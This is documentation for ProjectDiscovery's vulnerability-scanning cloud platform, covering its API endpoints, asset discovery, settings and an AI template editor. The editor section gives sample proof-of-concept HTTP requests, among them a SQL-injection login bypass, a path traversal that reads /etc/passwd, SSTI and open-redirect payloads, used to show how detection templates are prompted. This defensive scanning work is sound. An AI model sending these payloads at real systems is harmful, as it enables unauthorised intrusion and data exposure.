# Delete Asset
delete /v1/assets/{asset_id}
Delete asset by ID
# Get Asset Content
get /v1/assets/{asset_id}/contents
Get user asset content
# Get Asset Metadata
get /v1/assets/{asset_id}
Get asset metadata
# Update Asset Content
patch /v1/assets/{asset_id}/contents
Update existing asset content
# Upload Asset
post /v1/assets
Manually upload user assets (added to a manual enumeration)
# Add Config
post /v1/scans/config
Add a new scan configuration
# Add excluded templates
post /v1/scans/config/exclude
Add excluded templates
# Delete Config
delete /v1/scans/config/{config_id}
Delete scan configuration
# Delete excluded template IDs
delete /v1/scans/config/exclude
Delete excluded template IDs
# Get Config
get /v1/scans/config/{config_id}
Get a scan configuration
# Get Configs List
get /v1/scans/config
Get user scan configurations list
# Get excluded templates
get /v1/scans/config/exclude
Get excluded templates
# Update Config
patch /v1/scans/config/{config_id}
Update existing scan configuration
# Get error logs of a given scan ID
get /v1/scans/{scan_id}/error_log
# Create Enumeration
post /v1/asset/enumerate
Create a new enumeration
# Delete Bulk Enumeration
delete /v1/asset/enumerate
Delete enumerations by enumerate IDs
# Delete Enumeration
delete /v1/asset/enumerate/{enumerate_id}
Delete enumeration by enumerate_id
# Delete Enumeration Schedule
delete /v1/enumeration/schedule
Delete a re-scan schedule
# Export Enumeration
get /v1/asset/enumerate/{enum_id}/export
Export enumeration content
# Export Enumeration of User
get /v1/asset/enumerate/export
Export all enumeration content for a user
# Get All Enumeration Contents
get /v1/asset/enumerate/contents
Get all enumeration contents
# Get all enumeration stats
get /v1/asset/enumerate/stats
# Get Enumeration
get /v1/asset/enumerate/{enumerate_id}
Get enumeration by enumerate_id
# Get enumeration config
get /v1/asset/enumerate/{enumerate_id}/config
# Get Enumeration Contents
get /v1/asset/enumerate/{enumerate_id}/contents
Get enumeration content by enumerate_id
# Get Enumeration List
get /v1/asset/enumerate
Get enumeration list
# Get Enumeration Schedules
get /v1/enumeration/schedule
Get enumeration re-scan schedule
# Get enumeration stats
get /v1/asset/enumerate/{enumerate_id}/stats
# Group assets by filters
get /v1/asset/enumerate/filters
# Group assets by filters for an enumeration
get /v1/asset/enumerate/{enumerate_id}/filters
# Rescan Enumeration
post /v1/asset/enumerate/{enumerate_id}/rescan
Re-run an existing enumeration
# Set Enumeration Schedule
post /v1/enumeration/schedule
Set enumeration re-scan frequency
# Stop Enumeration
post /v1/asset/enumerate/{enumerate_id}/stop
Stop a running enumeration
# Update Enumeration
patch /v1/asset/enumerate/{enumerate_id}
Update enumeration by enumerate_id
# Get audit logs for team
get /v1/team/audit_log
# Cloud API Reference Introduction
Details on the ProjectDiscovery Cloud Platform API
## Overview
The ProjectDiscovery Cloud Platform API v1 is organized around [REST](http://en.wikipedia.org/wiki/Representational_State_Transfer). Our API has resource-oriented URLs, accepts and returns JSON in most cases, and the API uses standard HTTP response codes, authentication, and verbs. Our API also conforms to the [OpenAPI Specification](https://www.openapis.org/).
This API documentation will walk you through each of the available resources, and provides code examples for `cURL`, `Python`, `JavaScript`, `PHP`, `Go` and `Java`. Each endpoint includes the required authorization information and parameters, and provides examples of the response you should expect.
## Authentication
The ProjectDiscovery Cloud Platform API uses API keys to authenticate requests. You can view and manage your API key in ProjectDiscovery Cloud Platform at [https://cloud.projectdiscovery.io/](https://cloud.projectdiscovery.io/) under your user information.
Authentication with the API is performed using a custom request header, `X-Api-Key`, which should be set to the value of the API key found in your ProjectDiscovery Cloud Platform account.
You must make all API calls over `HTTPS`. Calls made over plain HTTP will fail, as will requests without authentication or without all required parameters.
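For example, here is a minimal Python sketch of an authenticated request against the `GET /v1/user` endpoint listed in this reference (the base URL is an assumption for illustration; confirm it for your account):

```python
import os

import requests

BASE_URL = "https://api.projectdiscovery.io"  # assumed base URL

# All calls must be made over HTTPS and authenticated with the X-Api-Key header.
headers = {"X-Api-Key": os.environ["PDCP_API_KEY"]}

# GET /v1/user returns the profile and permissions of the authenticated user.
resp = requests.get(f"{BASE_URL}/v1/user", headers=headers)
resp.raise_for_status()
print(resp.json())
```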
## Resources
Below (and in the menu on the left) you can find the various resources available through the ProjectDiscovery Cloud Platform API:
* **Assets**: Your assets (hosts, CIDR ranges, etc.) for scanning.
* **Templates**: Access public and private templates as well as AI template creation.
* **Scans**: Manage scans, scan schedules, and create new scans.
* **Vulnerabilities**: See and manage vulnerabilities detected by PDCP.
* **Retest**: Retest vulnerabilities or run single template/target scans.
* **Users**: See and manage user settings, API keys and more.
# Get All Results
get /v1/scans/results
Get scan results of a user
# Get Results Stats
get /v1/scans/results/stats
Get user scan results stats
# Get Scan Results
get /v1/scans/result/{scanId}
Get results of a specific scan by ID
# Get Scan Vulnerability
get /v1/scans/vuln/{vuln_id}
Get scan result vulnerability by ID
# Get Scans Result Filters
get /v1/scans/results/filters
Get the user's scan-result filters
# Get scan log of a given scan ID
get /v1/scans/{scan_id}/scan_log
# Create Scan
post /v1/scans
Trigger a scan
# Create Vulnerability Export to Tracker
post /v1/scans/vulns/{vuln_id}/ticket
Export a vulnerability to a configured ticket tracker
# Delete Scan
delete /v1/scans/{scan_id}
Delete a scan using scan ID
# Delete Bulk Scans
delete /v1/scans
Delete multiple scans using scan IDs
# Delete Scan Schedule
delete /v1/scans/schedule
Delete scan schedule for a user
# Delete Scan Vulnerability
delete /v1/scans/vulns
Batch delete scan vulnerabilities
# Export Filtered Scan
post /v1/scans/{scan_id}/export
Export filtered scan results
# Export Scan
get /v1/scans/{scan_id}/export
Export scan results
# Export Scan Vulnerability
get /v1/scans/vuln/{vuln_id}/export
Export a specific scan vulnerability
# Get All Scan Stats
get /v1/scans/stats
Get all scans statistics for a user
# Get All Scans History
get /v1/scans/history
Get user scan history details
# Get Scan
get /v1/scans/{scan_id}
Get details of a scan by scan ID
# Get Scan Config
get /v1/scans/{scan_id}/config
Get scan metadata config
# Get Scan History
get /v1/scans/{scanId}/history
Get scan history detail by scanId
# Get Scan IPs
get /v1/scans/scan_ips
Get list of static IPs used for scan
# Get Scan List
get /v1/scans
Get the status of user scans
# Get Scan Schedules
get /v1/scans/schedule
Get scan schedules for a user
# Get Scans Token
get /v1/scans/token
Get user scan token usage details
# Import OSS Scan
post /v1/scans/import
Import scan details
# Rescan scan
post /v1/scans/{scan_id}/rescan
Re-run an existing scan
# Retest vulnerability
post /v1/scans/{vuln_id}/retest
Retest a scan vulnerability
# Set Scan Schedule
post /v1/scans/schedule
Set a scan schedule for a user
# Stop Scan
post /v1/scans/{scan_id}/stop
Stop a running scan; this has no effect on scans in any other state.
# Update Imported Scan
patch /v1/scans/{scan_id}/import
Import more results to a given scan
# Update Scan
patch /v1/scans/{scan_id}
Update scan metadata
# Update Scan Config
patch /v1/scans/{scan_id}/config
Update scan metadata config
# Update Vulnerability Labels
patch /v1/scans/vulns/labels
Batch update vulnerability labels
# Update Vulnerability Status
patch /v1/scans/vulns
Batch update vulnerability status
# Create Template
post /v1/template
Create a private template
# Delete Template
delete /v1/template/{template_id}
Delete private template using ID
# Generate AI Template
post /v1/template/ai
Generate a private template with AI Engine
# Get Early Template
get /v1/template/early/{id}
Get early template text
# Get Early Template List
get /v1/template/early
Get PDCP early template list
# Get Github Template
get /v1/template/github/{id}
Get GitHub template text
# Get Github Template List
get /v1/template/github
List all of the user's GitHub templates
# Get Public Template
get /v1/template/public/*
Get public template text using path
# Get Public Template List
get /v1/template/public
Get public-template list
# Get Public Template Stats
get /v1/template/stats
Get public template statistics
# Get Share Status
get /v1/template/share
Get template shared status (shared-with-link)
# Get Shared Template
get /v1/template/share/{template_id}
Get a shared template text
# Get Template
get /v1/template/{template_id}
Get private template text using ID
# Get Template List
get /v1/template
Get the user's private (my) templates
# Share Template
post /v1/template/share
Share a private template (shared-with-link)
# Update Template
patch /v1/template
Update existing private template
# Update enumeration config
patch /v1/asset/enumerate/{enumerate_id}/config
# Create API Key
post /v1/user/apikey
Create a user API key; this won't create a new API key if one already exists.
# Delete API Key
delete /v1/user/apikey
Delete user API key
# Get API Key
get /v1/user/apikey
Get user API key
# Get User Profile
get /v1/user
Get user profile and permissions
# Rotate API Key
post /v1/user/apikey/rotate
Rotate user API key
# ProjectDiscovery Cloud Platform Settings & Administration
Review administrative, team, and account settings
## Summary
This guide covers general account administration under settings in the ProjectDiscovery Cloud Platform (PDCP). These administrative and system settings include details about your account, team settings for administrators, and password/2FA.
If you have questions about settings that are not covered here, or functionality that you think would be helpful, [get in touch](/help).
For details on other settings check out the guides for those features.
* [Scanning](/cloud/scanning/overview)
* [Assets](/cloud/assets/overview)
* [Templates](/cloud/editor/overview)
## Settings
[Profile settings](https://cloud.projectdiscovery.io/settings) are available from the global navigation under your sign-in (top right) for access to your Profile, Team, Scan IPs and more.
## Profile
Profile displays your username, email address, and the option to delete your account.
*Note: The ability to update these profile components will be available in a future release.*
## Team
Under **Settings → Team** all users can view team settings. Users with the appropriate permissions can also modify team settings and manage team members.
View or update team names, manage team members, and delete teams (supported for team owners).
* Use **Create Team** to create a new team (up to 2 for Pro Tier).
* To modify team settings, select a team from the global navigation to display those settings.
### User Types
ProjectDiscovery Cloud Platform supports four types of users with the following permissions:
* Owner: Read, write, invite, billing
* Admin: Read, write, invite
* Member: Read, write
* Viewer: Read
### Managing Teams
Teams can be created by Pro and Custom tier users. A Pro subscription supports up to two teams with 10 members. For a larger number of teams, or a greater number of members, get in touch about a Custom tier configuration.
## Scan IPs
Add Static IPs for greater control over your infrastructure scanning.
## Billing
Purchase, view, or modify your subscription. A subscription to our Pro tier starts at \$250/month for scanning of up to 1000 unique assets.
Additional upgrade options are also available with higher monthly asset limits - reach out to us with any questions about a custom contract.
## Security (Account Security)
Use Security to update your password or to enable 2-factor authentication.
* **Password** creates an account password that provides a login with your email (username) and password, as an alternative to using a linked account for login. These credentials will not replace any existing login configurations (for example: GitHub).
* **Two-step authentication** provides additional authentication for your account with an authenticator application.
# Assets in PDCP
Adding and managing Assets in ProjectDiscovery Cloud Platform
## Summary
Assets are any hosts added to ProjectDiscovery Cloud Platform (PDCP) for scanning. Hosts can be a URL, an IP address, or a CIDR range.
Assets can be added through either the Assets tab, or during the creation of a scan. Regardless of the path, adding assets to the Cloud Platform is the first step to running a scan and securing your tech stack against exploitable vulnerabilities.
From the Assets tab, there are three methods to add your assets:
* Add New Assets
* Connect Cloud Services
* HttpX Integration
Each unique path, including those with specified ports, will be added as an individual asset for scanning. If you have questions about your specific setup, get in touch with us at [support@projectdiscovery.io](mailto:support@projectdiscovery.io).
## Discover New Assets
Discovery is the easiest method of importing assets into PDCP for vulnerability scanning.
* **Scope**: manually input your list of up to 10 root domains in the Free plan, or up to 100 root domains in Pro.
* Auto Discovery is enabled by default and will automatically discover your assets including subdomains, open ports, and other web technologies. Port scanning and technology detection are available in Pro and Enterprise plans only.
* *Note: Disable Auto Discovery to restrict upload to your specified asset list.*
* Assets can be a domain, IP address, or CIDR range. For CIDR ranges, each individual IP will be added as a single asset.
* **Advanced**: Turning off Auto Discovery disables all discovery settings.
* Use Advanced to modify individual discovery settings for subdomains, open ports, etc.
* Customize the frequency of Auto Discovery to continuously monitor for new assets.
Check out [What is exposed?](/cloud/examples/addassets) for an example of adding assets for Discovery or Cloud Integration.
## Connect Cloud Services
The **Connect Cloud Services** option connects your PDCP environment to any of our supported cloud providers and pulls in assets once configured.
Cloud connections can be configured to check for updates to your assets and ensure your information is up to date.
For the majority of integrations, you only need to provide a name and the token or access details generated by the provider.
## HttpX Integration
See HttpX Integration [docs](https://docs.projectdiscovery.io/tools/httpx/running#ui-dashboard-pdcp-integration) and [blog](https://blog.projectdiscovery.io/introducing-httpx-dashboard-2/) for more details.
## Managing Assets
Once your assets are added successfully they display in the asset list.
* Use the context menu to **Rename**, **Update** (add or remove assets), **Re-Discover**, or **Delete** an asset.
* Uploaded assets are immediately available to use in scans.
* Assets that are part of an existing scan cannot be deleted.
# ProjectDiscovery Cloud Platform Assets
A high-level overview of the PDCP Asset functionality
## Overview
In the ProjectDiscovery Cloud Platform (PDCP), an asset is any host or target for vulnerability scanning. An asset is defined as the combination of a host (subdomain or IP address) and a specific port.
Assets can be discovered via Auto-Discovery from a root domain or specified IP/CIDR range. Note: IP and CIDR range discovery and enrichment are only available on Pro and Enterprise plans.
Assets can also be imported through our cloud integrations or direct upload through a .txt file.
Once assets are added to PDCP, they can be selected as targets in a vulnerability scan.
![Assets](https://mintlify.s3-us-west-1.amazonaws.com/projectdiscovery/images/platform/assetspage.png)
## FAQ
### General
**Is there a limitation to how many root domains I can run auto-discovery on?**
The Free tier supports up to 10 root domain discoveries per month, while Pro supports 100 domains per month and Enterprise offers custom limits.
**What kind of Assets are supported?**
Assets or hosts can be a URL, an IP address, a root domain, or a CIDR range.
**Can everyone in my team see all the Assets that were added to my environment?**
Yes, all assets in your environment are shared across your team.
### Assets and Scans
**Can I exempt specific assets from a scan?**
Yes. Building a new scan requires you to choose assets as part of the scan configuration, so a scan applies only to the assets you include; simply leave out any assets you want to exempt.
### Adding and Modifying Assets
**What's the difference between Add Assets and a cloud integration?**
* Add allows you to choose a list of individual assets or root domains to add as a list or TXT file.
* Enabling **Auto Discovery** automatically enumerates associated subdomains and open ports. Each subdomain or unique path identified is added as an individual asset.
* Cloud Integrations connect your cloud service provider and import any assets identified.
**Can I edit existing Assets?**
Yes! Assets that are added to PDCP can be renamed.
**Can I delete Assets?**
You can delete any assets; however, attempting to delete assets that are included in a scan will generate an error.
# AI Assistance
Review details on using AI to help generate templates for Nuclei and PDCP
[The Template Editor](https://cloud.projectdiscovery.io/) uses AI to generate templates for vulnerability reports. This document guides you through the process, offering usage tips and examples.
## Overview
Powered by ProjectDiscovery's deep library of public Nuclei templates and a rich CVE data set, the AI understands a broad array of security vulnerabilities. First, the system interprets the user's prompt to identify a specific vulnerability. Then, it generates a template based on the steps required to reproduce the vulnerability along with all the necessary meta information to reproduce and remediate.
## Initial Setup
Kick start your AI Assistance experience with these steps:
1. **Provide Detailed Information**: Construct comprehensive Proof of Concepts (PoCs) for vulnerabilities like Cross-Site Scripting (XSS), and others.
2. **Understand the Template Format**: Get to grips with the format to appropriately handle and modify the generated template.
3. **Validation and Linting**: Use the integrated linter to guarantee the template's validity.
4. **Test the Template**: Evaluate the template against a test target ensuring its accuracy.
## Best Practices
* **Precision Matters**: Detailed prompts yield superior templates.
* **Review and Validate**: Consistently check matchers' accuracy.
* **Template Verification**: Validate the template on known vulnerable targets before deployment.
## Example Prompts
The following examples demonstrate different vulnerabilities and the corresponding prompts.
Open redirect vulnerability identified in a web application. Here's the PoC:
HTTP Request:
```
GET /redirect?url=http://malicious.com HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
```
HTTP Response:
```
HTTP/1.1 302 Found
Location: http://malicious.com
Content-Length: 0
Server: Apache
```
The application redirects the user to the URL specified in the url parameter, leading to an open redirect vulnerability.
SQL Injection vulnerability in a login form. Here's the PoC:
HTTP Request:
```
POST /login HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

username=admin&password=' OR '1'='1
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome back, admin
...
```
The application improperly handles user input in the password field, leading to an SQL Injection vulnerability.
Business Logic vulnerability in a web application's shopping cart function allows for negative quantities, leading to credit. Here's the PoC:
HTTP Request:
```
POST /add-to-cart HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

product_id=1001&quantity=-1
```
HTTP Response:
```
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Product added to cart. Current balance: -$19.99
...
```
The application fails to validate the quantity parameter, resulting in a Business Logic vulnerability.
Server-side Template Injection (SSTI) vulnerability through a web application's custom greeting card function. Here's the PoC:
```
HTTP Request:
POST /create-card HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

message={{7*7}}
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Your card: 49
...
```
The application processes the message parameter as a template, leading to an SSTI vulnerability.
Insecure Direct Object Reference (IDOR) vulnerability discovered in a website's user profile page. Here's the PoC:
```
HTTP Request:
GET /profile?id=2 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Cookie: session=abcd1234
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache
...
Welcome, otheruser
...
```
The application exposes sensitive information of a user (ID: 2) who is not the authenticated user (session: abcd1234), leading to an IDOR vulnerability.
Path Traversal vulnerability identified in a web application's file download function. Here's the PoC:
```
HTTP Request:
GET /download?file=../../etc/passwd HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1827
Server: Apache

root:x:0:0:root:/root:/bin/bash
```
The application fetches the file specified in the file parameter from the server file system, leading to a Path Traversal vulnerability.
Business logic vulnerability in a web application's VIP subscription function allows users to extend the trial period indefinitely. Here's the PoC:
```
HTTP Request:
POST /extend-trial HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0
Cookie: session=abcd1234
```
```
HTTP Response:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 1337
Server: Apache

Your VIP trial period has been extended by 7 days.
```
The application does not limit the number of times the trial period can be extended, leading to a business logic vulnerability.
Each of these examples provides HTTP Requests and Responses to illustrate the vulnerabilities.
## Limitations
Please note that the current AI is trained primarily on HTTP data. Template generation for non-HTTP protocols is not supported at this time. Support for additional protocols is under development and will be available soon.
# Templates & Editor FAQ
Answers to common questions about Nuclei templates and our cloud platform template editor
Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are the core of the Nuclei project and ProjectDiscovery Cloud Platform. The templates contain the actual logic that is executed in order to detect various vulnerabilities.
The ProjectDiscovery template library contains **several thousand** ready-to-use **[community-contributed](https://github.com/projectdiscovery/nuclei-templates/graphs/contributors)** vulnerability templates. We are continuously working with our open source community
to update and add templates as vulnerabilities are discovered.
We maintain a [template guide](/templates/introduction/) for writing new and
custom Nuclei templates. ProjectDiscovery Cloud Platform also provides AI
support to assist in writing and testing custom templates. - Check out our
documentation on the [Templates Editor](/cloud/editor/ai) for more
information.
Performing security assessment of an application is time-consuming. It's always better and time-saving to automate steps whenever possible. Once you've found a security vulnerability, you can prepare a Nuclei template by defining the required HTTP request to reproduce the issue, and test the same vulnerability across multiple hosts with ease.
It's worth mentioning ==you write the template once and use it forever==, as you don't need to manually test that specific vulnerability any longer.
Here are a few examples from the community making use of templates to automate security findings:
* [https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/](https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/)
* [https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning](https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning)
* [https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites](https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites)
* [https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state](https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state)
* [https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out](https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out)
* [https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities](https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities)
Nuclei templates are selected as part of any scans you create. You can select pre-configured groups of templates, individual templates, or add your own custom templates as part of your scan configuration.
* Check out [the scanning documentation](/cloud/scanning/overview) to learn more.
You are always welcome to share your templates with the community. You can
either open a [GitHub
issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=nuclei-template\&template=submit-template.md\&title=%5Bnuclei-template%5D+template-name)
with the template details or open a GitHub [pull
request](https://github.com/projectdiscovery/nuclei-templates/pulls) with your
Nuclei templates. If you don't have a GitHub account, you can also make use of
the [discord server](https://discord.gg/projectdiscovery) to share the
template with us.
You own any templates generated by the AI through the Template Editor. They
are your property, and you are granted a perpetual license to use and modify
them as you see fit.
The Template Editor feature in PDCP uses OpenAI.
Yes, prompts are stored as part of the generated template metadata. This data
is deleted as soon as the template or the user is deleted.
The accuracy of the generated templates is primarily dependent on the detail
and specificity of the input you provide. The more detailed information you
supply, the better the AI can understand the context and create an accurate
template. However, as with any AI tool, it is highly recommended to review,
validate, and test any generated templates before using them in a live
environment.
No, AI does not use the templates you generate for further training or
improvement of the AI model. The system only uses public templates and CVE
data for training, ensuring your unique templates remain confidential.
# Template Editor Overview
Learn more about using the Nuclei Templates Editor
For more in-depth information about Nuclei templates, including details on template structure and supported protocols, [check out the templates documentation](/templates/introduction).
[The Template Editor](https://cloud.projectdiscovery.io) is a multi-functional cloud-hosted tool designed for creating, running, and sharing templates (Nuclei and ProjectDiscovery Cloud Platform). It's packed with helpful features for individual and professional users seeking to manage and execute templates.
![Templates Editor](https://mintlify.s3-us-west-1.amazonaws.com/projectdiscovery/images/editor.jpg)
## Template Compatibility
In addition to the Template Editor, ProjectDiscovery Cloud Platform (PDCP) supports any templates compatible with [Nuclei](/tools/nuclei/overview). These templates use exactly the same powerful YAML format supported in open source.
Take a look at our [Templates](/templates/introduction) documentation for a wealth of resources available around template design, structure, and how they can be customized to meet an enormous range of use cases. As always, if you have questions [we're here to help](/help/home).
## Features
Current and upcoming features:
| Feature | Description and Use | Availability |
| -------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------ |
| **Editor** | Experience something akin to using VS Code with our integrated editor, built on top of Monaco. This feature allows easy writing and modification of Nuclei Templates. | Free |
| **Optimizer** | Leverage the in-built TemplateMan API to automatically lint, format, validate, and enhance your Nuclei Templates. | Free |
| **Scan (URL)** | Run your templates on a targeted URL to check their validity. | Free \* |
| **Debugger** | Utilize the in-built debugging function that displays requests and responses of your template scans, aiding troubleshooting and understanding template behavior. | Free |
| **Cloud Storage** | Store and access your Nuclei Templates securely anytime, anywhere using your account. | Free |
| **Sharing** | Share your templates for better collaboration by generating untraceable unique links. | Free |
| **AI Assistance** | Employ AI to craft Nuclei Templates based on the context of specified vulnerabilities. This feature simplifies template creation and minimizes the time required to create them. | Free \* |
| **Scan (LIST, CIDR, ASN)** | In the professional version, run scans on target lists, network ranges (CIDR), AS numbers (ASN). | Teams |
| **REST API** | In the professional version, fetch templates, call the AI, and perform scans remotely using APIs. | Teams |
| **PDCP Sync** | Sync your generated templates with the ProjectDiscovery Cloud Platform for easy access and management, available in the professional version. | Teams |
## Free Feature Limitations
Some features available within the free tier have usage caps in place:
* **Scan (URL):** You're allowed up to **100** scans daily.
* **AI Assistance:** Up to **10** queries can be made each day.
These limits reset daily and ensure system integrity and availability while providing access to key functions.
## How to Get Started
Begin by ensuring you have an account. If not, sign up on [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io/) and follow the steps below:
1. Log in to your account at [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io).
2. Click on the "**Create new template**" button to open up a fresh editor.
3. Write and modify your template. The editor includes tools like syntax highlighting, snippet suggestions, and other features to simplify the process.
4. After writing your template, input your testing target and click the "**Scan**" button to validate your template's accuracy.
# Recommended
Learn more about using Recommended Templates in PDCP (Teams)
The functionality described on this page is **only** available through
[ProjectDiscovery Cloud Platform Teams](https://projectdiscovery.io/pricing).
## Overview
When setting up a scan in ProjectDiscovery Cloud Platform (PDCP) you have the option to build your scan using custom templates, [all templates](https://github.com/projectdiscovery/nuclei-templates), or recommended templates.
**Recommended templates are a curated subset of the full template library designed for efficiently scanning your attack surface.**
This subset of templates, nearly 4000 in total, focuses on relevant and exploitable vulnerabilities, excluding informational templates and templates with the potential to generate false positives.
The curated set of Recommended templates is available as a config file that can be viewed in the Nuclei repository at [Recommended Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml), or within the application.
Rather than a list, PDCP's Recommended templates are curated through defined filters.
*This approach ensures that the curated list remains up-to-date as new templates are added.*
Filtering for Recommended templates includes the following (a rough sketch of the combined logic follows this list):
* All template severities except info
* Type: http, tcp, or javascript
* Exclusion of the tags: tech, dos, fuzz, creds-stuffing, token-spray, osint
* Exclusion of specific templates; the list is available for review in [Recommended Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/config/recommended.yml)
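As a rough illustration only, here is a hypothetical Python sketch of how these filters compose. This is not the actual PDCP implementation, which is driven by the recommended.yml config linked above:

```python
# Hypothetical sketch of how the Recommended filters compose.
EXCLUDED_TAGS = {"tech", "dos", "fuzz", "creds-stuffing", "token-spray", "osint"}
ALLOWED_TYPES = {"http", "tcp", "javascript"}

def is_recommended(template: dict, explicitly_excluded: set) -> bool:
    """Return True if a template passes the Recommended filters."""
    return (
        template["severity"] != "info"  # all severities except info
        and template["type"] in ALLOWED_TYPES
        and not EXCLUDED_TAGS.intersection(template.get("tags", []))
        and template["id"] not in explicitly_excluded  # per recommended.yml
    )
```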
If you have questions, reach out to us through [support@projectdiscovery.io](mailto:support@projectdiscovery.io).
# Template Sharing
Learn about sharing templates
The Template Editor offers the ability to share any public templates, including the ones you create.
To share a template, click on the "Share" button to generate a link that can be sent to others.
## How to Share Public Templates
Public templates are designed for ease of sharing. You don't need to be authenticated to share them, meaning there's no need to log in. These templates are mapped with their Template ID, following a static URL pattern. For instance, a public template URL might resemble this: [https://cloud.projectdiscovery.io/public/CVE-2023-35078](https://cloud.projectdiscovery.io/public/CVE-2023-35078). In the given URL, `CVE-2023-35078` is the Template ID representing the template in the [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) project.
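Because public templates follow this static URL pattern, they can also be fetched programmatically through the `GET /v1/template/public/*` route listed in this reference. Here is a minimal Python sketch, assuming the wildcard accepts the same template path and that the base URL below is correct for your account (both are assumptions; verify against the API reference):

```python
import os

import requests

BASE_URL = "https://api.projectdiscovery.io"  # assumed base URL
headers = {"X-Api-Key": os.environ["PDCP_API_KEY"]}  # API calls require authentication

# Assumption: the wildcard takes the template ID/path, e.g. CVE-2023-35078 as above.
resp = requests.get(f"{BASE_URL}/v1/template/public/CVE-2023-35078", headers=headers)
resp.raise_for_status()
print(resp.text)  # public template text
```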
## How to Share User Templates
User templates, unlike public templates, require authentication for sharing. These templates are assigned a unique, UUID-based ID similar to YouTube's unlisted URLs for sharing purposes. This means anyone given the shared URL will be able to access the template.
## Revoking Access to Shared Templates
If at any point you want to limit the access to the shared template, it is as simple as changing the visibility of the template to private. After this change, the originally shared link will become inactive. However, you have the flexibility to share it again, which would generate a new unique ID.
Please remember, while sharing is easy, it's important to distribute the URL cautiously as the link allows full access to the shared template.
# Editor Keyboard Shortcuts
Review keyboard shortcuts for Nuclei templates
The Template Editor is equipped with keyboard shortcuts to make it more efficient. You can use these shortcuts whether you're creating a new template or optimizing an existing one, enabling quicker actions without interfering with your workflow.
Here is a list of the actions, along with their corresponding shortcut keys and descriptions:
| **Action** | **Shortcut Key** | **Description** |
| --------------------- | ----------------------- | ------------------------------------------------------------ |
| Save Template | **CMD + S** | Saves the current template. |
| Duplicate Template | **CMD + D** | Creates a copy of a public template. |
| Execute Template | **CMD + SHIFT + SPACE** | Run a scan with the current template. |
| Share Template Link | **ALT + SHIFT + SPACE** | Generates a URL for sharing the current template. |
| Search Templates | **CMD + K** | Searches within your own templates. |
| Copy Template | **CMD + SHIFT + C** | Copies the selected template to your clipboard. |
| Show/Hide Side Bar | **CMD + B** | Toggles the visibility of the side bar. |
| Show/Hide Debug Panel | **CMD + SHIFT + M** | Toggles the visibility of the debug panel for extra insight. |
For Mac users, the CMD key is used for these shortcuts.
Non-Mac users (Windows and Linux) should use the CTRL key instead.
# What is exposed?
Add Assets to identify where your tech stack is exposed to the internet
## Summary
Walk through the steps you need to identify the assets in your environment that you want to protect.
For organizations that have visibility into their technical stack or inventory, you can easily upload a list of assets to the Cloud platform or use this [API endpoint.](https://docs.projectdiscovery.io/api-reference/assets/upload-asset)
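A minimal Python sketch of scripting that upload is shown below. The base URL and the request body shape are assumptions for illustration; confirm the exact schema against the Upload Asset endpoint in the API reference:

```python
import os

import requests

BASE_URL = "https://api.projectdiscovery.io"  # assumed base URL
headers = {"X-Api-Key": os.environ["PDCP_API_KEY"]}

# Assumption: POST /v1/assets accepts a JSON payload naming the upload and
# listing the hosts; verify the exact field names in the API reference.
payload = {
    "name": "inventory-upload",
    "assets": ["app.example.com", "api.example.com", "203.0.113.0/24"],
}
resp = requests.post(f"{BASE_URL}/v1/assets", headers=headers, json=payload)
resp.raise_for_status()
print(resp.json())
```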
For users that do not have a full list of assets, we have two options:
* **Add Assets with Auto Discovery** - This is the simplest approach for a quick understanding of your exposed assets. Auto Discovery is supported by multiple open source ProjectDiscovery tools to find subdomains, ports, and endpoints that are exposed on the internet.
* *Note: We are actively building this feature. Discovery will continue to expand and improve to reflect the robust scope found in our open source tools.*
* **Integrate Cloud Services** - This feature supports numerous cloud service providers (AWS, GCP, Azure, CloudFlare, Fastly, and others). Once the integration is configured, the Cloud Platform polls the configured cloud service provider to continuously update
for any changes made by your team.
## Add Assets
### Add a Cloud Integration
Navigate to [https://cloud.projectdiscovery.io/assets](https://cloud.projectdiscovery.io/assets)
Choose **Integrate Cloud Services** to show the full list of supported cloud services providers.
Select from the available cloud service providers, click **Connect** and provide the configuration details.
Select **Verify** to complete the configuration and get the Cloud Platform started on discovering your assets.
### Add New Assets with Auto Discovery
Navigate to [https://cloud.projectdiscovery.io/assets](https://cloud.projectdiscovery.io/assets)
Choose **Add New Assets** to open the asset workflow.
Add your Assets as root domains, IPs, or CIDR ranges you want to enumerate.
